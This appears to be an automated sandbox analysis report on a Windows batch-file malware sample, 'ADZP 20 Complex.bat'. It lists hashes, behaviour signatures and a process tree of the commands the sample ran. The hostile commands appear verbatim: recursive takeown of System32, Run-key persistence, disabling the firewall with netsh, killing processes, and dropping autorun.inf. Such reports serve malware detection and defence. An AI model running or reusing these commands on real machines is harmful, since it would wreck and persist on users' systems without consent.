Analysis
max time kernel: 8s
max time network: 142s
platform: windows10-2004_x64
resource: win10v2004-20240508-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240508-en, locale:en-us, os:windows10-2004-x64, system
submitted: 25-05-2024 23:57
Static task: static1
Behavioral task: behavioral1
Sample: ADZP 20 Complex.bat
Resource: win7-20240215-en
Behavioral task: behavioral2
Sample: ADZP 20 Complex.bat
Resource: win10v2004-20240508-en
General
Target: ADZP 20 Complex.bat
Size: 17KB
MD5: 591700c81fbd38cf8c83092030536c14
SHA1: a122ca4b91ec2275400e10f21093c43186391c97
SHA256: 29415d32850d821d9854bfd6edabee920052e0920e6eceec187ea57b8a3c707e
SHA512: ae3e1ffef5a82016f13fe728a8a3f2696ed55cdd9ea60d6e75352d55f95fe71cb09bad02945601d4661818473882cc4fae4493d9125e3803054e69c861a97758
SSDEEP: 192:Un0iMJWap3ahz9j3E301VaYYATCdhSouXKN:ZJWo3yzHVbYMW
Malware Config
Signatures
-
Modifies Windows Firewall 2 TTPs 3 IoCs
Processes (pid, process):
8564 netsh.exe
8348 netsh.exe
8512 netsh.exe
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
Processes (description | ioc | process):
Key value queried | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation | cmd.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation | cmd.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation | cmd.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation | cmd.exe
Modifies file permissions 1 TTPs 13 IoCs
Processes (pid, process):
8484 takeown.exe
9712 takeown.exe
3996 takeown.exe
6092 takeown.exe
6084 takeown.exe
7528 takeown.exe
9580 takeown.exe
9720 takeown.exe
6028 takeown.exe
9568 takeown.exe
2988 takeown.exe
3592 takeown.exe
6384 takeown.exe
Adds Run key to start application 2 TTPs 1 IoCs
Processes (description | ioc | process):
Set value (str) | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Twain_20 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Twain_20.cmd" | reg.exe
Drops autorun.inf file 1 TTPs 5 IoCs
Malware can abuse Windows Autorun to spread further via attached volumes.
Processes (description | ioc | process):
File opened for modification | C:\Users\Admin\AppData\Local\Temp\Autorun.inf | cmd.exe
File opened for modification | C:\Users\Admin\AppData\Local\Temp\Autorun.inf | attrib.exe
File opened for modification | C:\Users\Admin\AppData\Local\Temp\Autorun.inf | cmd.exe
File opened for modification | C:\Users\Admin\AppData\Local\Temp\Autorun.inf | cmd.exe
File opened for modification | C:\Users\Admin\AppData\Local\Temp\Autorun.inf | cmd.exe
Drops file in System32 directory 5 IoCs
Processes (description | ioc | process):
File opened for modification | C:\Windows\System32\Twain_20.dll | cmd.exe
File created | C:\Windows\System32\Twain_20.dll | cmd.exe
File opened for modification | C:\Windows\System32\Twain_20.dll | cmd.exe
File opened for modification | C:\Windows\System32\Twain_20.dll | cmd.exe
File opened for modification | C:\Windows\System32\Twain_20.dll | cmd.exe
Drops file in Windows directory 3 IoCs
Processes (description | ioc | process):
File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | mspaint.exe
File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | mspaint.exe
File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | mspaint.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Gathers network information 2 TTPs 13 IoCs
Uses commandline utility to view network configuration.
Processes (pid, process):
440 ipconfig.exe
1780 ipconfig.exe
4924 ipconfig.exe
10084 ipconfig.exe
10192 ipconfig.exe
3792 ipconfig.exe
1892 ipconfig.exe
10104 ipconfig.exe
924 ipconfig.exe
10152 ipconfig.exe
9976 ipconfig.exe
6072 ipconfig.exe
6112 ipconfig.exe
Kills process with taskkill 13 IoCs
Processes (pid, process):
4992 taskkill.exe
1868 taskkill.exe
3972 taskkill.exe
5188 taskkill.exe
9812 taskkill.exe
8580 taskkill.exe
4684 taskkill.exe
2344 taskkill.exe
3544 taskkill.exe
7984 taskkill.exe
3828 taskkill.exe
9740 taskkill.exe
10256 taskkill.exe
Modifies registry class 9 IoCs
Processes (description | ioc | process):
Key created | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings | cmd.exe
Key created | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings | explorer.exe
Key created | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings | explorer.exe
Key created | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings | explorer.exe
Key created | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings | calc.exe
Key created | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings | cmd.exe
Key created | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings | calc.exe
Key created | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings | cmd.exe
Key created | \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000_Classes\Local Settings | cmd.exe
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes (pid, process):
2996 mspaint.exe
2996 mspaint.exe
1688 mspaint.exe
1688 mspaint.exe
3284 mspaint.exe
3284 mspaint.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes (description | pid | process):
Token: SeTakeOwnershipPrivilege | 2988 | takeown.exe
Token: SeDebugPrivilege | 4992 | taskkill.exe
Suspicious use of SetWindowsHookEx 14 IoCs
Processes (pid, process):
2996 mspaint.exe
1688 mspaint.exe
2996 mspaint.exe
2996 mspaint.exe
2996 mspaint.exe
1688 mspaint.exe
1688 mspaint.exe
1688 mspaint.exe
3284 mspaint.exe
3284 mspaint.exe
3284 mspaint.exe
3284 mspaint.exe
972 OpenWith.exe
5096 OpenWith.exe
Suspicious use of WriteProcessMemory 64 IoCs
Views/modifies file attributes 1 TTPs 13 IoCs
Processes (pid, process):
12776 attrib.exe
1632 attrib.exe
7668 attrib.exe
5580 attrib.exe
1280 attrib.exe
7288 attrib.exe
10096 attrib.exe
12880 attrib.exe
228 attrib.exe
4656 attrib.exe
5824 attrib.exe
10112 attrib.exe
5600 attrib.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"1⤵
- Checks computer location settings
- Drops autorun.inf file
- Drops file in System32 directory
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd2⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f2⤵
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f2⤵
-
C:\Windows\system32\ipconfig.exeipconfig /release2⤵
- Gathers network information
-
C:\Windows\system32\taskkill.exetaskkill /im DiskPart /f2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\attrib.exeattrib -r -a -s -h *.*2⤵
- Drops autorun.inf file
- Views/modifies file attributes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"2⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"2⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"2⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"2⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"2⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"2⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"2⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"2⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"2⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"2⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado2⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado2⤵
-
C:\Windows\system32\msg.exemsg * Has Sido Hackeado!2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"2⤵
- Checks computer location settings
- Drops autorun.inf file
- Drops file in System32 directory
- Modifies registry class
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat3⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r4⤵
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f3⤵
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f3⤵
-
C:\Windows\system32\ipconfig.exeipconfig /release3⤵
- Gathers network information
-
C:\Windows\system32\taskkill.exetaskkill /im DiskPart /f3⤵
- Kills process with taskkill
-
C:\Windows\system32\attrib.exeattrib -r -a -s -h *.*3⤵
- Views/modifies file attributes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"3⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado3⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado3⤵
-
C:\Windows\system32\msg.exemsg * Has Sido Hackeado!3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd4⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall set publicprofile state off4⤵
- Modifies Windows Firewall
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat4⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r5⤵
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f4⤵
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f4⤵
-
C:\Windows\system32\ipconfig.exeipconfig /release4⤵
- Gathers network information
-
C:\Windows\system32\taskkill.exetaskkill /im DiskPart /f4⤵
- Kills process with taskkill
-
C:\Windows\system32\attrib.exeattrib -r -a -s -h *.*4⤵
- Views/modifies file attributes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"4⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado4⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado4⤵
-
C:\Windows\system32\msg.exemsg * Has Sido Hackeado!4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"4⤵
-
C:\Windows\system32\notepad.exenotepad4⤵
-
C:\Windows\system32\calc.execalc4⤵
-
C:\Windows\explorer.exeexplorer.exe4⤵
-
C:\Windows\system32\mspaint.exemspaint.exe4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"4⤵
-
C:\Windows\system32\notepad.exenotepad4⤵
-
C:\Windows\system32\notepad.exenotepad3⤵
-
C:\Windows\system32\calc.execalc3⤵
-
C:\Windows\explorer.exeexplorer.exe3⤵
-
C:\Windows\system32\mspaint.exemspaint.exe3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd4⤵
-
C:\Windows\system32\reg.exeREG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Twain_20 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\Twain_20.cmd"5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat4⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r5⤵
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f4⤵
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f4⤵
-
C:\Windows\system32\ipconfig.exeipconfig /release4⤵
- Gathers network information
-
C:\Windows\system32\taskkill.exetaskkill /im DiskPart /f4⤵
- Kills process with taskkill
-
C:\Windows\system32\attrib.exeattrib -r -a -s -h *.*4⤵
- Views/modifies file attributes
-
C:\Windows\system32\notepad.exenotepad3⤵
-
C:\Windows\system32\calc.execalc3⤵
-
C:\Windows\explorer.exeexplorer.exe3⤵
-
C:\Windows\system32\mspaint.exemspaint.exe3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat4⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r5⤵
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f4⤵
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f4⤵
-
C:\Windows\system32\ipconfig.exeipconfig /release4⤵
- Gathers network information
-
C:\Windows\system32\taskkill.exetaskkill /im DiskPart /f4⤵
- Kills process with taskkill
-
C:\Windows\system32\attrib.exeattrib -r -a -s -h *.*4⤵
- Views/modifies file attributes
-
C:\Windows\system32\notepad.exenotepad3⤵
-
C:\Windows\system32\calc.execalc3⤵
-
C:\Windows\explorer.exeexplorer.exe3⤵
-
C:\Windows\system32\mspaint.exemspaint.exe3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"3⤵
-
C:\Windows\system32\notepad.exenotepad2⤵
-
C:\Windows\system32\calc.execalc2⤵
- Modifies registry class
-
C:\Windows\explorer.exeexplorer.exe2⤵
- Modifies registry class
-
C:\Windows\system32\mspaint.exemspaint.exe2⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"2⤵
- Checks computer location settings
- Drops autorun.inf file
- Drops file in System32 directory
- Modifies registry class
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd3⤵
-
C:\Windows\system32\reg.exeREG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Twain_20 /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\Twain_20.cmd"4⤵
- Adds Run key to start application
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat3⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r4⤵
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f3⤵
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f3⤵
-
C:\Windows\system32\ipconfig.exeipconfig /release3⤵
- Gathers network information
-
C:\Windows\system32\taskkill.exetaskkill /im DiskPart /f3⤵
- Kills process with taskkill
-
C:\Windows\system32\attrib.exeattrib -r -a -s -h *.*3⤵
- Views/modifies file attributes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"3⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"3⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado3⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado3⤵
-
C:\Windows\system32\msg.exemsg * Has Sido Hackeado!3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Informacion.vbs"4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Taskdl.bat4⤵
-
C:\Windows\system32\takeown.exetakeown /f "C:\Windows\System32" /r5⤵
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f4⤵
-
C:\Windows\system32\reg.exereg add hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f4⤵
-
C:\Windows\system32\ipconfig.exeipconfig /release4⤵
- Gathers network information
-
C:\Windows\system32\taskkill.exetaskkill /im DiskPart /f4⤵
- Kills process with taskkill
-
C:\Windows\system32\attrib.exeattrib -r -a -s -h *.*4⤵
- Views/modifies file attributes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"4⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado4⤵
-
C:\Windows\system32\msg.exemsg * Virus Detectado4⤵
-
C:\Windows\system32\msg.exemsg * Has Sido Hackeado!4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"4⤵
-
C:\Windows\system32\notepad.exenotepad4⤵
-
C:\Windows\system32\calc.execalc4⤵
-
C:\Windows\explorer.exeexplorer.exe4⤵
-
C:\Windows\system32\mspaint.exemspaint.exe4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"4⤵
-
C:\Windows\system32\notepad.exenotepad4⤵
-
C:\Windows\system32\calc.execalc4⤵
-
C:\Windows\explorer.exeexplorer.exe4⤵
-
C:\Windows\system32\mspaint.exemspaint.exe4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"4⤵
-
C:\Windows\system32\notepad.exenotepad4⤵
-
C:\Windows\system32\calc.execalc4⤵
-
C:\Windows\explorer.exeexplorer.exe4⤵
-
C:\Windows\system32\mspaint.exemspaint.exe4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ErrorCritico.vbs"4⤵
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Advertencia.vbs"4⤵
-
C:\Windows\system32\notepad.exenotepad3⤵
-
C:\Windows\system32\calc.execalc3⤵
-
C:\Windows\explorer.exeexplorer.exe3⤵
-
C:\Windows\system32\mspaint.exemspaint.exe3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\ADZP 20 Complex.bat"3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K Twain_20.cmd4⤵
-
